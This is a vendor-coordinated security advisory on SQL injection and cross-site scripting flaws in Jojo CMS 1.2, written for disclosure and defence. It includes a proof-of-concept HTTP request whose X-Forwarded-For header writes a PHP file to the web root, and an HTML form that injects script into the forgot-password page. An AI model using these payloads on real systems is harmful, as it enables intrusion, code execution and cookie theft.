Product: Jojo CMS
Vendor: The Jojo Team
Vulnerable Versions: 1.2 and probably prior
Tested Version: 1.2
Vendor Notification: April 17, 2013
Vendor Fix: May 6, 2013
Public Disclosure: May 15, 2013
Vulnerability Type: SQL Injection [CWE-89]
Cross-Site Scripting [CWE-79]
CVE References: CVE-2013-3081
Risk Level: Medium
CVSSv2 Base Scores: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Jojo CMS, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) SQL Injection in Jojo CMS: CVE-2013-3081
The vulnerability is caused by insufficient filtration of user-supplied input passed to the "X-Forwarded-For" HTTP header in "/articles/test/" URI. A remote unauthenticated attacker can send a specially crafted HTTP request and execute arbitrary SQL commands in application’s database.
The PoC code below will create a file "/var/www/file.php" containing content of "comment" table (if web and database server configurations allow):
POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
The above-mentioned PoC code can be used to execute arbitrary PHP code on the vulnerable system if the attacker creates a comment containing PHP code.
Successful exploitation of the vulnerability requires that "jojo comments" plugin is enabled (disabled by default).
2) Cross-Site Scripting (XSS) in Jojo CMS: CVE-2013-3082
The vulnerability exists due to insufficient filtration of user-supplied data passed to "search" HTTP POST parameter in "/forgot-password/" URI. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
<form action="http://jojo/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
Upgrade to Jojo CMS to version 1.2.2
https://github.com/JojoCMS/Jojo-CMS/com ... add3a987d8
https://github.com/JojoCMS/Jojo-CMS/com ... 2cbf2d2236
 High-Tech Bridge Advisory HTB23153 - https://www.htbridge.com/advisory/HTB23153 - Multiple vulnerabilities in Jojo CMS
 Jojo CMS - http://www.jojocms.org/ - Jojo is a PHP-based free CMS for web developers wanting to build good websites.
 Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.